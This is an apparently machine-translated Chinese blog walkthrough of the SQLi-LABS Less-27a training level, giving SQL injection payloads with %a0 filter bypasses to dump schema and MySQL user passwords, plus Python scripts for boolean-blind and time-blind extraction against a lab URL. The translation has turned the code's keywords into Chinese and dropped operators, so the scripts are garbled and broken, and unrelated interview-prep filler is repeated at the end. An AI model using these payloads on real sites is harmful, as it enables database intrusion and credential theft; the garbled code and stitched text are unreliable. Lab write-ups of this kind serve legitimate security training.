SQLi LABS Less 27a 联合注入+布尔盲注+时间盲注_sqlilabs第27a关(sqlmap布尔盲注)

SQLi LABS Less 27a 联合注入+布尔盲注+时间盲注_sqlilabs第27a关SELEct%a0group_concat(column_name) from%a0information_schema.columns%a0 w

SELECT%a0group_concat(列名)

来自%a0information_schema.columns%a0

其中%a0table_schema=\’安全\’%a0and%a0table_name=\’用户\’

获取数据库管理员用户密码

SELECT%a0group_concat(用户名,密码)

来自%a0mysql.user%a0where%a0user=‘Mitsuan’

### 方法2:布尔盲注

有关使用布尔盲注的详细说明,请参阅我的其他文章。

【布尔盲注如何使用详解,原理+步骤+实用教程】( )

**第一步,确定注入点**

如果在地址栏中输入?id=1\’and\’1,页面将正常显示。

如果在地址栏输入“?id=1\’and\’0”,页面异常(空)。

**第2步,确定长度**

以您当前的数据库为例,假设数据库名称长度大于1,则在地址栏中输入以下内容:

?id=1\’ 和%a0

长度(

(数据库())

)1

%a0和\’1

库名称必须大于1,以确保页面正确显示并且负载可用。

测试长度从1开始依次增加,其余由脚本决定。

**第3步,枚举字符**

截取库名的第一个字符,将其转换为ASCLL代码,并判断其是否大于1。在地址栏中输入:

?id=1\’ 和%a0

ASCII (

子字符串(

(数据库())

,1,1)

)1

%a0和\’1

字符的ASCLL 代码必须大于1,以确保页面显示正确且负载可用。

接下来判断字符的ASCLL码是否等于(32~126)。

确定第一个字符的内容后,按照此方法确定其余字符。为了提高效率,我们将使用稍后将枚举的脚本。

**移动**

Python 中的自动推理脚本如下,可以根据您的需要进行修改。

导入请求

将url 替换成你的靶场关卡网址

修改两个对应的payload

目标网址(不带参数)

URL=“http://8ad7ef14ce564257803e9f3eabade873.app.mituan.zone/Less-27a/”

猜解长度使用的payload

Payload_len=\”\”\”?id=1\’和%a0

长度(

(数据库())

)={n}

%a0和\’1\’\’\’\’

枚举字符使用的payload

Payload_str=\”\”\”?id=1\’和%a0

ASCII (

子字符串(

(数据库())

,{l},1)

)={n}

%a0和\’1\’\’\’\’

获取长度

def getLength(url, 有效负载):

length=1 # 初始测试长度为1

而True:

Response=request.get(url=url+payload_len.format(n=长度))

# 如果页面上存在该内容则表示成功。

如果“您的登录名”响应。文本:

print(\’长度测试完成。长度为:\’, length,)

返回长度;

: 其他

print(\’测试长度:\’, length)

length +=1 # 增加测试长度

获取字符

def getStr(url, 负载, 长度):

str=\’\’ # 初始表名/库名为空

# 在循环的第一级截取每个字符

: 表示范围(1, 长度+ 1) 内的l

# 循环的第二级枚举了截取该字符的所有可能性。

对于(33, 126): 范围内的n

响应=request.get(url=url+payload_str.format(l=l, n=n))

# print(\’猜猜\’, n)

# 如果页面上存在该内容则表示成功。

如果“您的登录名”响应。文本:

字符串+=字符(n)

print(\’th\’, l, \’成功猜出字符:\’, str)

休息;

返回一个字符串。

开始猜解

长度=getLength(url, Payload_len)

getStr(url,payload_str,长度)

执行结果如下。

![](https://img-blog.csdnimg.cn/46e27d6753814d93b19afd2b28796c70.png)

对于其他数据库删除操作,只需将下面圆圈中的位置替换为您的SQL语句即可。

![](https://img-blog.csdnimg.cn/43ca66b9ab3541da98ee0532a8d22cf8.png)

![](https://img-blog.csdnimg.cn/fb8d9b5f896f402c988037dcf0da760b.png)

常用的库删除语句见方法一末尾。

### 方法3:时盲注入

**第一步,确定注入点**

如果在地址栏中输入?id=1\’and\’1,页面将正常显示。

如果在地址栏输入“?id=1\’and\’0”,页面异常(空)。

**第2步,确定长度**

以您当前的数据库为例,检查数据库名称的长度是否大于1。如果大于1,请在地址栏中键入以下内容:

?id=1\’ 和%a0

如果(

(长度(

(数据库())

)1)

, 睡眠(5), 3)

%a0和\’1

库名长度必须大于1,页面延迟为5秒以确保有效负载可用。

从1 开始,依次增加测试长度,然后使用脚本进行确定。

**第3步,枚举字符**

截取库名称的第一个字符,将其转换为ASCLL 代码,并检查它是否大于1。如果大于1,请在地址栏中键入以下内容:

?id=1\’ 和%0a

如果(

(ASCII(

子字符串(

(数据库())

,1,1)

)1)

, 睡眠(5), 3)

%a0和\’1

该字符的ASCLL 代码必须大于1,因此页面将延迟5 秒以确保有效负载可用。

接下来判断字符的ASCLL码是否等于(32~126)。

确定第一个字符的内容后,按照此方法确定其他字符,稍后使用脚本枚举。

**移动**

Python 自动化脚本如下,可以根据需要进行修改。

导入请求

导入时间

将url 替换成你的靶场关卡网址

修改两个对应的payload

目标网址(不带参数)

URL=“http://8ad7ef14ce564257803e9f3eabade873.app.mituan.zone/Less-27a/”

猜解长度使用的payload

Payload_len=\”\”\”?id=1\’和%a0

如果(

(长度(

(数据库())

)={n})

, 睡眠(5), 3)

%a0和\’1\’\’\’\’

枚举字符使用的payload

Payload_str=\”\”\”?id=1\’和%0a

如果(

(ASCII(

子字符串(

(数据库())

,{n},1)

)={r})

, 睡眠(5), 3)

%a0和\’1\’\’\’\’

获取长度

def getLength(url, 有效负载):

length=1 # 初始测试长度为1

而True:

开始时间=时间.time()

Response=request.get(url=url+payload_len.format(n=长度))

# 页面响应时间=执行结束时间-执行开始时间

use_time=time.time() – 开始时间

# 响应时间为5秒表示猜测成功。

使用时间5:

print(\’长度测试完成。长度为:\’, length,)

返回长度;

: 其他

print(\’测试长度:\’, length)

length +=1 # 增加测试长度

获取字符

def getStr(url, 负载, 长度):

str=\’\’ # 初始表名/库名为空

# 在循环的第一级截取每个字符

: 表示范围(1, 长度+ 1) 内的l

# 循环的第二级枚举了截取该字符的所有可能性。

对于(33, 126): 范围内的n

开始时间=时间.time()

响应=request.get(url=url+payload_str.format(n=l, r=n))

# 页面响应时间=执行结束时间-执行开始时间

use_time=time.time() – 开始时间

# 如果页面上存在该内容则表示成功。

使用时间5:

字符串+=字符(n)

print(\’th\’, l, \’成功猜出字符:\’, str)

休息;

返回一个字符串。

开始猜解

长度=getLength(url, Payload_len)

getStr(url,payload_str,长度)

执行结果如下。

终于

51zkw的编辑总结道,成功只属于那些做好准备的人。参加任何类型的面试时,你需要做的就是做好充分的准备,注意面试礼仪和着装,向面试官展示你的热情和诚意。即使最终没有通过考试,你也应该总结一下自己的经验,为下次面试做好充分的准备。

**在这里,我们准备了一些专门的采访材料,是我们采访后整理的。除了面试题,我们还整理了互联网公司Android程序员面试的大部分面试题及答案。希望我们的文档和系统的进阶学习视频资料分享给大家,帮助您面试前复习,找到好工作,节省网上查找资料的时间。 **

毕竟,无论遇到什么样的面试官,去面试最重要的还是自己的优势,如果你有足够的能力和技巧,就不会害怕失败。面试后offer!

![](https://img-blog.csdnimg.cn/img_convert/481956ff77574ee177d4c4e7fd04d748.webp?x-oss-process=image/format,png)

![](https://img-blog.csdnimg.cn/img_convert/09bf1f561edc92c9e0633afc4d406424.webp?x-oss-process=image/format,png)

别人之所以总是比你优秀,是因为他们已经非常优秀了,而且他们一直在努力变得更好。你是否还对现状感到满意,心里暗暗高兴呢?今后我们将不断更新技术信息,如果您在阅读本文后能够“点赞”或“关注”我们,我们将不胜感激。

![](https://img-blog.csdnimg.cn/img_convert/c20f97064728c162f9532538455ad805.webp?x-oss-process=image/format,png)

节省网上搜索信息学习的时间。 **

毕竟,无论遇到什么样的面试官,去面试最重要的还是自己的优势,如果你有足够的能力和技巧,就不会害怕失败。面试后offer!

[外部链接图像正在传输.(img-TYJOuK40-1720043384444)]

[外部链接图像正在传输.(img-Ohxve7al-1720043384444)]

别人之所以总是比你优秀,是因为他们已经非常优秀了,而且他们一直在努力变得更好。你是否还对现状感到满意,心里暗暗高兴呢?我们将不断更新技术信息,如果您在阅读本文后能够“喜欢”或“关注”我们,我们将不胜感激。

[外部链接图像正在传输.(img-UWQdwiu1-1720043384445)]

#SQLi LABS Less 27a 联合注入+布尔盲注入+时间盲注入_sqlilabs Level 27a 相关内容以上源网络信息仅供参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/92839.html

(0)
CSDN's avatarCSDN
上一篇 2024年7月4日 下午4:35
下一篇 2024年7月4日 下午4:36

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注